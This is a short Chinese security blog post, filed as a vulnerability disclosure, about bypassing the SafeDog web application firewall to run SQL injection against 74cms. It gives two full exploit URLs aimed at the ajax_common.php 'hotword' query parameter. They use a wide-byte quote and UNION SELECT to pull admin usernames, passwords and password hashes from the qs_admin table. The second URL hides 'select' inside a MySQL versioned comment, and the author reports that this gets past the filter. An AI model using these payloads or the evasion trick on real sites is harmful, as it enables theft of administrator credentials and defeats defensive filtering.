绕过安全狗注入

提交:

http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

20140625121359
被拦截了,经过测试拦截的是select,那么把select换成/*!50000SeLect*/呢

然后提交

http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

20140625121605

成功绕过

作者:Sunshie

本文固定链接: https://www.unhonker.com/bug/1614.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2014年06月25日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 绕过安全狗注入 | 90' s Blog|关注网络信息安全
关键字:

绕过安全狗注入:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!